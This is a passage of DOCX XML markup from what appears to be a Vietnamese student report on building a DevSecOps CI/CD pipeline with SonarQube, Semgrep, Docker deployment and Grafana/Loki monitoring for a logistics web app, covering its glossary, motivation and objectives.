            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="418C03F4" w14:textId="77777777" w:rsidR="00F24C64" w:rsidRPr="00A76C93" w:rsidRDefault="00F24C64" w:rsidP="00C202B1">
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b/>
                <w:szCs w:val="24"/>
                <w:lang w:val="vi-VN"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00A76C93">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b/>
                <w:szCs w:val="24"/>
                <w:lang w:val="vi-VN"/>
              </w:rPr>
              <w:t>Thuật ngữ tiếng Việt/Giải thích</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:bookmarkEnd w:id="9"/>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CI/CD</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Continuous Integration / Continuous Deployment</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Quy trình tích hợp và chuyển giao phần mềm tự động liên tục</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DevSecOps</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Development, Security, and Operations</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Phương pháp luận tích hợp an ninh vào toàn bộ vòng đời phát triển phần mềm</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Shift-Left</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Shift-Left Security Strategy</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Chiến lược dịch chuyển việc kiểm thử an ninh về các pha sớm trong chu kỳ phát triển mã nguồn</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SAST</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Static Application Security Testing</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Kỹ thuật kiểm thử an ninh ứng dụng tĩnh trực tiếp trên mã nguồn</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DAST</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Dynamic Application Security Testing</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Kỹ thuật kiểm thử an ninh ứng dụng động khi dịch vụ đang chạy</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SCA</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Software Composition Analysis</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Phân tích thành phần và lỗ hổng phụ thuộc bên thứ ba trong phần mềm</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FOSS</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Free and Open-Source Software</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Phần mềm nguồn mở tự do, không phát sinh chi phí bản quyền</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GHCR</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GitHub Container Registry</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Kho lưu trữ và phân phối Docker Image của GitHub</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AST</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Abstract Syntax Tree</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Cây cú pháp trừu tượng đại diện cho cấu trúc mã nguồn phần mềm</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CFG</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Control Flow Graph</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Đồ thị luồng điều khiển biểu diễn các đường thực thi của chương trình</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Taint Analysis</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Taint-based Data Flow Analysis</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Phương pháp phân tích luồng dữ liệu ô nhiễm từ Source đầu vào đến Sink thực thi</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Source / Sink</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Data Source / Sensitive Execution Sink</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Điểm tiếp nhận dữ liệu đầu vào / Điểm thực thi câu lệnh nhạy cảm</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Sanitizer</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Data Sanitization Function</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Hàm làm sạch, mã hóa và lọc an toàn dữ liệu</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Quality Gate</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Code Quality &amp; Security Gate</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Ngưỡng điều kiện chặn chất lượng và an ninh mã nguồn trước khi tích hợp</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Zero-Downtime</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Zero-Downtime Deployment</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Triển khai phiên bản mới mà không làm gián đoạn hoặc ngắt quãng dịch vụ</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Dual-Track</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Dual-Track Compose Lifecycle</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Kiến trúc phân tách độc lập vòng đời giữa khối ứng dụng và khối giám sát</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Dual-Stream</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Dual-Stream Logging Architecture</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Kiến trúc phân tách độc lập giữa log chẩn đoán ứng dụng và log lưu lượng HTTP</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Observability</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System Observability (Logs, Metrics, Traces)</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Khả năng giám sát và đo lường trạng thái nội tại của hệ thống</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Auto-Healing</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Automated Container Healing</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Cơ chế giám sát nhịp tim và tự động khởi động lại container khi lỗi</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SQLi</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SQL Injection</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Kỹ thuật tấn công chèn câu lệnh SQL trái phép vào cơ sở dữ liệu</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RCE / CMDi</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Remote Code Execution / Command Injection</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Lỗ hổng cho phép kẻ tấn công thực thi mã lệnh shell tùy ý trên máy chủ</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NPM</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Nginx Proxy Manager</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Hệ thống quản lý máy chủ Reverse Proxy và chứng chỉ SSL</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VPS</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Virtual Private Server</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Máy chủ riêng ảo phục vụ môi trường Production</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OWASP</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Open Web Application Security Project</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Tổ chức quốc tế về tiêu chuẩn an ninh ứng dụng web</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CWE</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Common Weakness Enumeration</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Hệ thống phân loại các điểm yếu an ninh phần mềm chuẩn quốc tế</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="1D3B95A7" w14:textId="77777777" w:rsidR="00F24C64" w:rsidRPr="00AE47E8" w:rsidRDefault="00F24C64" w:rsidP="00F24C64">
      <w:pPr>
        <w:pStyle w:val="CTDT-Text"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="75251B66" w14:textId="77777777" w:rsidR="00DF76DB" w:rsidRDefault="00DF76DB" w:rsidP="00F24C64">
      <w:pPr>
        <w:pStyle w:val="CTDT-Text"/>
        <w:rPr>
          <w:b/>
          <w:caps/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="31D3B48C" w14:textId="77777777" w:rsidR="008425EB" w:rsidRDefault="008425EB" w:rsidP="00DF76DB">
      <w:pPr>
        <w:pStyle w:val="CTDT-H0"/>
        <w:sectPr w:rsidR="008425EB" w:rsidSect="008425EB">
          <w:footerReference w:type="default" r:id="rId10"/>
          <w:pgSz w:w="11907" w:h="16840" w:code="9"/>
          <w:pgMar w:top="1134" w:right="1021" w:bottom="1134" w:left="1418" w:header="340" w:footer="340" w:gutter="0"/>
          <w:pgNumType w:fmt="lowerRoman" w:start="1"/>
          <w:cols w:space="720"/>
          <w:docGrid w:linePitch="326"/>
        </w:sectPr>
      </w:pPr>
      <w:bookmarkStart w:id="10" w:name="_Toc153572010"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CTDT-H0"/>
        <w:spacing w:before="360" w:after="240"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:sz w:val="30"/>
        </w:rPr>
        <w:t>PHẦN MỞ ĐẦU</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CTDT-H2"/>
        <w:spacing w:before="200" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="27"/>
        </w:rPr>
        <w:t>1. Lý do chọn đề tài</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CTDT-Text"/>
        <w:spacing w:line="300" w:lineRule="auto" w:before="0" w:after="120"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>Trong tiến trình chuyển đổi sang điện toán đám mây và kiến trúc dịch vụ phân tán, phương pháp luận DevOps đã chứng minh được tính ưu việt vượt bậc trong việc rút ngắn chu kỳ phát hành phần mềm. Thông qua việc tự động hóa đường ống CI/CD, các tổ chức công nghệ có thể phát hành hàng chục phiên bản mỗi ngày. Tuy nhiên, tốc độ gia tăng nhanh chóng này vô hình trung tạo ra nghịch lý lớn đối với công tác bảo đảm an toàn thông tin: các quy trình kiểm định an ninh truyền thống vốn phụ thuộc vào đánh giá thủ công hoặc kiểm thử định kỳ trước khi phát hành đã trở thành điểm nghẽn nghiêm trọng trong toàn bộ vòng đời phát triển.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CTDT-Text"/>
        <w:spacing w:line="300" w:lineRule="auto" w:before="0" w:after="120"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>Thực tế công nghiệp cho thấy việc phát hiện lỗ hổng muộn tại giai đoạn đưa lên máy chủ sản xuất kéo theo chi phí khắc phục gấp từ 30 đến 100 lần so với việc xử lý ngay tại giai đoạn lập trình mã nguồn. Các nguy cơ an ninh ứng dụng web, điển hình là danh mục OWASP Top 10 với trọng tâm là các lỗ hổng chèn câu lệnh SQL trái phép và thực thi mã độc từ xa, tiếp tục là nguyên nhân trực tiếp dẫn tới các sự cố rò rỉ dữ liệu doanh nghiệp quy mô lớn.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CTDT-Text"/>
        <w:spacing w:line="300" w:lineRule="auto" w:before="0" w:after="120"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>Để giải quyết bài toán mâu thuẫn giữa tốc độ phát hành liên tục và tính an toàn hệ thống, triết lý Shift-Left Security ra đời, thúc đẩy việc tích hợp an ninh vào mọi khâu của vòng đời phát triển phần mềm, hình thành nên mô hình DevSecOps. Tuy nhiên, việc áp dụng DevSecOps trong thực tế doanh nghiệp thường gặp phải hai rào cản lớn:</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Chi phí bản quyền và tính khép kín:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> Các giải pháp thương mại thường có chi phí rất cao, khó tùy biến sâu vào hạ tầng nội bộ.</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Xung đột vòng đời và điểm mù giám sát:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> Việc thiếu phân tách giữa chu kỳ cập nhật của ứng dụng nghiệp vụ và chu kỳ vận hành của hạ tầng quan sát thường gây ra hiện tượng gián đoạn dịch vụ hoặc làm thất thoát dữ liệu nhật ký kiểm toán trong các đợt phát hành phiên bản mới.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CTDT-Text"/>
        <w:spacing w:line="300" w:lineRule="auto" w:before="0" w:after="120"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>Xuất phát từ thực tiễn trên, công trình này tập trung thiết kế và triển khai một quy trình DevSecOps CI/CD tự động hóa hoàn chỉnh cho hệ thống InlaneWeb Logistics, vận hành trên nền tảng các công nghệ nguồn mở miễn phí, kết hợp quét an ninh mã nguồn nhiều tầng với cụm giám sát tập trung và cơ chế cập nhật không làm gián đoạn người dùng trên máy chủ sản xuất.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CTDT-H2"/>
        <w:spacing w:before="200" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="27"/>
        </w:rPr>
        <w:t>2. Mục tiêu nghiên cứu</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CTDT-H3"/>
        <w:spacing w:before="160" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>2.1. Mục tiêu tổng quát</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CTDT-Text"/>
        <w:spacing w:line="300" w:lineRule="auto" w:before="0" w:after="120"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>Mục tiêu cốt lõi của đề tài là xây dựng một hệ thống phát triển, đóng gói, triển khai và giám sát tự động hóa toàn diện từ đầu đến cuối cho ứng dụng web InlaneWeb Logistics. Hệ thống giải quyết trọn vẹn 3 yêu cầu thực tế trong vận hành phần mềm:</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Bảo mật ngay từ khâu viết code:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> Tự động phát hiện và chặn đứng các lỗ hổng mã nguồn nguy hiểm (đặc biệt là lỗi chèn câu lệnh SQL trái phép và thực thi mã độc) ngay trong quá trình lập trình, trước khi mã được đưa vào hệ thống chung.</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Triển khai an toàn và liên tục:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> Đóng gói ứng dụng thành các Docker image chuẩn hóa, tự động kiểm thử trên môi trường tạm và triển khai lên máy chủ VPS thật mà không làm gián đoạn dịch vụ của người dùng, đồng thời giữ an toàn toàn bộ dữ liệu cơ sở dữ liệu.</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Giám sát và tự phục hồi:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> Thiết lập trung tâm giám sát tập trung để ghi lại mọi hành vi bất thường, phát hiện các đợt tấn công web theo thời gian thực và tự động khởi động lại dịch vụ nếu ứng dụng gặp sự cố.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CTDT-H3"/>
        <w:spacing w:before="160" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>2.2. Mục tiêu cụ thể</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CTDT-Text"/>
        <w:spacing w:line="300" w:lineRule="auto" w:before="0" w:after="120"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>Để đạt được mục tiêu tổng quát nêu trên, nhóm tập trung thực hiện 5 nhiệm vụ kỹ thuật cụ thể:</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Kiểm soát mã nguồn ngay tại máy lập trình viên và trên nhánh làm việc:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CTDT-Bullet2"/>
        <w:spacing w:line="288" w:lineRule="auto" w:before="0" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>Cài đặt cơ chế kiểm soát cục bộ qua Git Hook (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>commit-msg</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>): tự động chặn đứng ngay tại máy trạm các thông điệp commit không tuân thủ chuẩn Conventional Commits trước khi đẩy lên kho lưu trữ từ xa.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CTDT-Bullet2"/>
        <w:spacing w:line="288" w:lineRule="auto" w:before="0" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">Xây dựng bộ quy tắc kiểm soát tự động Policy Guard tại Stage 1 trên GitHub Actions: kiểm tra toàn diện thông điệp commit được push, cưỡng chế quy chuẩn tiêu đề Pull Request 2 tầng và chặn các luồng tạo PR vi phạm mô hình phân cấp nhánh (nhánh cá nhân chỉ được mở PR vào </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>dev</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">, và </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>main</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> chỉ nhận PR phát hành từ </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>dev</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Chặn lỗi bảo mật và kiểm tra chất lượng code tự động bằng SonarQube và Semgrep:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CTDT-Bullet2"/>
        <w:spacing w:line="288" w:lineRule="auto" w:before="0" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>Dùng SonarQube để tự động đo chất lượng code: kiểm tra cú pháp, tính toán thời gian cần bỏ ra để sửa các đoạn mã viết cẩu thả hoặc khó bảo trì (nợ kỹ thuật), và chỉ cho phép đưa code vào nhánh phát triển khi đạt chuẩn chất lượng loại A cao nhất.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CTDT-Bullet2"/>
        <w:spacing w:line="288" w:lineRule="auto" w:before="0" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>Dùng Semgrep để rà soát chuyên sâu các lỗi logic: truy vết dữ liệu do người dùng nhập vào xem có bị nối thẳng vào câu lệnh SQL hoặc lệnh hệ thống hay không, chặn đứng 100% các điểm yếu bảo mật phổ biến (như SQL Injection, đọc file trái phép, thực thi lệnh trên máy chủ).</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Tự động kiểm thử trên môi trường tạm trước khi đóng gói:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CTDT-Bullet2"/>
        <w:spacing w:line="288" w:lineRule="auto" w:before="0" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>Xây dựng bộ kiểm tra tự động 21 tiêu chí cho toàn bộ các file cấu hình Docker và hệ thống giám sát.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CTDT-Bullet2"/>
        <w:spacing w:line="288" w:lineRule="auto" w:before="0" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>Tự động dựng một cụm web và database tạm thời trên máy ảo GitHub Actions để chạy thử. Chỉ khi web phản hồi bình thường (HTTP 200) thì hệ thống mới đóng gói thành Docker image hoàn chỉnh và lưu trữ lên GitHub Container Registry.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CTDT-Text"/>
        <w:spacing w:line="300" w:lineRule="auto" w:before="40" w:after="80"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">4. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>Triển khai tự động lên máy chủ VPS không gián đoạn dịch vụ và giữ an toàn dữ liệu:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CTDT-Bullet2"/>
        <w:spacing w:line="288" w:lineRule="auto" w:before="0" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>Kết nối an toàn từ GitHub Actions tới máy chủ VPS qua SSH với cặp khóa mã hóa Ed25519.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CTDT-Bullet2"/>
        <w:spacing w:line="288" w:lineRule="auto" w:before="0" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>Tách riêng việc quản lý giữa ứng dụng web và cụm giám sát thành hai dự án Docker Compose độc lập, tránh việc triển khai ứng dụng làm xóa nhầm hoặc xung đột với hệ thống giám sát.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CTDT-Bullet2"/>
        <w:spacing w:line="288" w:lineRule="auto" w:before="0" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>Lưu trữ dữ liệu database trên volume riêng biệt để không bao giờ bị mất dữ liệu khi cập nhật phiên bản mới.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CTDT-Bullet2"/>
        <w:spacing w:line="288" w:lineRule="auto" w:before="0" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>Thêm cơ chế tự động thăm dò: sau khi cập nhật, hệ thống tự động kiểm tra liên tục cho đến khi web sẵn sàng phục vụ rồi mới xác nhận triển khai thành công.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CTDT-Text"/>
        <w:spacing w:line="300" w:lineRule="auto" w:before="40" w:after="80"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">5. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>Giám sát an ninh tập trung và tự phục hồi khi gặp sự cố:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CTDT-Bullet2"/>
        <w:spacing w:line="288" w:lineRule="auto" w:before="0" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>Triển khai cụm công cụ Promtail, Loki và Grafana trên VPS. Tách riêng 2 luồng log: log lỗi nội bộ của ứng dụng PHP và log truy cập HTTP của web server để dễ dàng điều tra.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CTDT-Bullet2"/>
        <w:spacing w:line="288" w:lineRule="auto" w:before="0" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>Xây dựng bảng điều khiển Grafana với 8 biểu đồ trực quan, giúp người quản trị nhìn thấy ngay địa chỉ IP của kẻ tấn công, đường link bị khai thác và câu lệnh độc hại khi web bị tấn công bằng SQL Injection hay XSS.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CTDT-Bullet2"/>
        <w:spacing w:line="288" w:lineRule="auto" w:before="0" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>Thắt chặt an toàn cho trang quản trị Grafana: tắt chế độ xem nặc danh, đặt mật khẩu quản trị phức tạp và ngẫu nhiên.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CTDT-Bullet2"/>
        <w:spacing w:line="288" w:lineRule="auto" w:before="0" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>Tích hợp công cụ Autoheal để tự động kiểm tra nhịp tim của web: nếu ứng dụng bị treo hoặc tràn bộ nhớ quá 90 giây, hệ thống sẽ tự động khởi động lại container trong vài giây mà không cần người quản trị can thiệp thủ công.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CTDT-H3"/>
        <w:spacing w:before="160" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>2.3. Các câu hỏi cần giải quyết trong đề tài</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CTDT-Text"/>
        <w:spacing w:line="300" w:lineRule="auto" w:before="0" w:after="120"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>Trong quá trình thực hiện, đề tài tập trung trả lời 3 câu hỏi thực tế:</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sz w:val="26"/>
        </w:rPr>
        <w:t>Làm thế nào để quét lỗi bảo mật thật kỹ mà pipeline vẫn chạy nhanh (dưới 3 phút), không làm lập trình viên phải chờ đợi quá lâu mỗi khi mở Pull Request?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sz w:val="26"/>
        </w:rPr>
        <w:t>Làm thế nào để cập nhật phiên bản mới lên VPS mà web không bị sập hay gián đoạn, và dữ liệu database cũ vẫn an toàn 100%?</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sz w:val="26"/>
        </w:rPr>
        <w:t>Làm thế nào để phân tách và thu thập log hiệu quả, giúp người quản trị phát hiện ngay lập tức khi máy chủ bị tấn công thực tế mà không làm tốn tài nguyên VPS?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CTDT-H2"/>
        <w:spacing w:before="200" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="27"/>
        </w:rPr>
        <w:t>3. Đối tượng và phạm vi nghiên cứu</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CTDT-Bullet1"/>
        <w:spacing w:line="288" w:lineRule="auto" w:before="0" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
